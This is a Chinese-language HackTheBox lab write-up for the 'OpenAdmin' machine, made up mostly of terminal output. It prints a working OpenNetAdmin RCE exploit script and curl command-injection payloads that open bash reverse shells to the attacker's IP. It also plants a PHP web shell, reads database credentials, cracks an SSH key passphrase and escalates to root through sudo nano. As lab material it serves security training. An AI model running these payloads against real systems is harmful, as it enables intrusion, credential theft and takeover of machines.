title: HackTheBox-OpenAdmin author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/OpenAdmin.png tags:
•LInux
Crazy:~/HackThebox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.171
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 06:01:02 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.171
Discovered open port 80/tcp on 10.10.10.171
Crazy:~/HackThebox/OpenAdmin$ sudo nmap -sC -sV 10.10.10.171 -oN OpenAdmin -p22,80
[sudo] crazyinside 的密码:
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 14:03 CST
Nmap scan report for 10.10.10.171
Host is up (0.096s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b98df85d17ef03dda48cdbc9200b754 (RSA)
| 256 dceb3dc944d118b122b4cfdebd6c7a54 (ECDSA)
|_ 256 dcadca3c11315b6fe6a489347c9be550 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.83 seconds
zsh: segmentation fault sudo nmap -sC -sV 10.10.10.171 -oN OpenAdmin -p22,80
Crazy:~/HackThebox/OpenAdmin$ curl -I 10.10.10.171
HTTP/1.1 200 OK
Date: Mon, 22 Aug 2022 06:04:16 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 21 Nov 2019 14:08:45 GMT
ETag: "2aa6-597dbd5dcea8b"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html
80端口是Apache默认页面。
Crazy:~/HackThebox$ dirsearch -u http://10.10.10.171/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.171/-_22-08-22_14-04-03.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_14-04-03.log
Target: http://10.10.10.171/
[14:04:03] Starting:
[14:04:11] 403 - 277B - /.ht_wsr.txt
[14:04:11] 403 - 277B - /.htaccess.save
[14:04:11] 403 - 277B - /.htaccess.sample
[14:04:11] 403 - 277B - /.htaccess.bak1
[14:04:11] 403 - 277B - /.htaccess_extra
[14:04:11] 403 - 277B - /.htaccessOLD
[14:04:11] 403 - 277B - /.htaccess.orig
[14:04:11] 403 - 277B - /.htaccess_orig
[14:04:11] 403 - 277B - /.htaccess_sc
[14:04:11] 403 - 277B - /.htaccessBAK
[14:04:11] 403 - 277B - /.htaccessOLD2
[14:04:11] 403 - 277B - /.htm
[14:04:11] 403 - 277B - /.httr-oauth
[14:04:11] 403 - 277B - /.html
[14:04:11] 403 - 277B - /.htpasswd_test
[14:04:11] 403 - 277B - /.htpasswds
[14:04:13] 403 - 277B - /.php
[14:04:59] 200 - 11KB - /index.html
[14:05:07] 301 - 312B - /music -> http://10.10.10.171/music/
[14:05:09] 301 - 310B - /ona -> http://10.10.10.171/ona/
[14:05:18] 403 - 277B - /server-status
[14:05:18] 403 - 277B - /server-status/
都是一些静态页面,顺着登录可以跳转到
并且顺着帮助索引能够跳转到Github,Github有说默认口令是admin:admin。
Crazy:~/HackThebox/OpenAdmin$ searchsploit opennetadmin
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
msf的好像没什么用:
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options
Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /ona/login.php yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set RHOSTS 10.10.10.171
RHOSTS => 10.10.10.171
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Exploiting...
[*] Command Stager progress - 100.00% done (702/702 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Exploiting...
[*] Command Stager progress - 100.00% done (702/702 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) >
Crazy:~/HackThebox/OpenAdmin$ cat 47691.sh
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo "BEGIN";${cmd};echo "END"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Crazy:~/HackThebox/OpenAdmin$
Crazy:~/HackThebox/OpenAdmin$ curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping" http://10.10.10.171/ona/
在页面中会回显执行的结果:
</tr>
</table>
<!-- Module Output -->
<table style="background-color: #F2F2F2; padding-left: 25px; padding-right: 25px;" width="100%" cellspacing="0" border="0" cellpadding="0">
<tr>
<td align="left" class="padding">
<br>
<div style="border: solid 2px #000000; background-color: #FFFFFF; width: 650px; height: 350px; overflow: auto;resize: both;">
<pre style="padding: 4px;font-family: monospace;">BEGIN
uid=33(www-data) gid=33(www-data) groups=33(www-data)
END
</pre>
</div>
</td>
</tr>
</table>
<!-- Just a little padding -->
<table style="background-color: #F2F2F2; padding-left: 25px; padding-right: 25px;" width="100%" cellspacing="0" border="0" cellpadding="0">
<tr>
<td id="tooltips_extras" align="center" class="padding"><input type="button" class="edit" name="Close" value="Close" onclick="removeElement('tooltips_results');"><br></td>
</tr>
</table>
</td>
</tr>
</table>]]></cmd><cmd n="js"><![CDATA[toggle_window('tooltips_results');]]></cmd></xjx>
Crazy:~/HackThebox/OpenAdmin$ curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo "BEGIN";bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.3%2F1337%200%3E%261%27;echo "END"&xajaxargs[]=ping" http://10.10.10.171/ona/
www-data@openadmin:/var/www/html/ona/local/config$ ls
database_settings.inc.php motd.txt.example run_installer
<ml/ona/local/config$ cat database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>www-data@openadmin:/var/www/html/ona/local/config$
数据库里没什么信息:
mysql> select * from users;
+----+----------+----------------------------------+-------+---------------------+---------------------+
| id | username | password | level | ctime | atime |
+----+----------+----------------------------------+-------+---------------------+---------------------+
| 1 | guest | 098f6bcd4621d373cade4e832627b4f6 | 0 | 2022-08-22 06:31:46 | 2022-08-22 06:31:46 |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 | 0 | 2022-08-22 06:16:34 | 2022-08-22 06:16:34 |
+----+----------+----------------------------------+-------+---------------------+---------------------+
密码复用可以登录jimmy:
jimmy@openadmin:/etc/apache2/sites-enabled$ ls
internal.conf openadmin.conf
jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
jimmy@openadmin:/etc/apache2/sites-enabled$
在端口52846似乎还运行着什么服务:
Crazy:~/HackThebox/OpenAdmin$ ssh jimmy@10.10.10.171 -L 52846:localhost:52846
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.171' (ED25519) to the list of known hosts.
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
jimmy@openadmin:/var/www/internal$ ls
index.php logout.php main.php
jimmy@openadmin:/var/www/internal$ echo 1 > 1.txt
jimmy@openadmin:/var/www/internal$ ls
1.txt index.php logout.php main.php
echo '<?php system($_GET["hack"]); ?>' > hack.php
jimmy@openadmin:/var/www/internal$
curl 'http://127.0.0.1:52846/hack.php?hack=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.3/1338%200%3E%261%27'
随便哪个会话触发一下就行了:
Crazy:~/HackThebox$ nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.171] 49182
bash: cannot set terminal process group (1221): Inappropriate ioctl for device
bash: no job control in this shell
joanna@openadmin:/var/www/internal$
但是这种shell会受限很多。运行sudo时候会报错。我尝试去用户目录读取了id_rsa,但在使用的过程中需要输入密码:
Crazy:~/HackThebox/OpenAdmin$ ssh2john id_rsa > hash
Crazy:~/HackThebox/OpenAdmin$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa)
1g 0:00:00:02 DONE (2022-08-22 14:54) 0.4566g/s 4371Kp/s 4371Kc/s 4371KC/s bloodofyouth..bloodmabite
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Crazy:~/HackThebox/OpenAdmin$
Crazy:~/HackThebox/OpenAdmin$ ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Aug 22 06:50:19 UTC 2022
System load: 0.01 Processes: 182
Usage of /: 31.0% of 7.81GB Users logged in: 1
Memory usage: 14% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15
joanna@openadmin:~$ ls
pwk.py user.txt
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, mail_badpass
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
joanna@openadmin:~$
这个提权,用的nano编辑器执行命令的效果,但是直接输入命令会被冻结,需要输入reset; /bin/sh 1>&0 2>&0,就会出现root标志性#:
Command to execute: reset; /bin/sh 1>&0 2>&0# id
uid=0(root) gid=0(root) groups=0(root) ^X Read File
# cat /root/root.txt M-F New Buffer
2984.................................
#
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论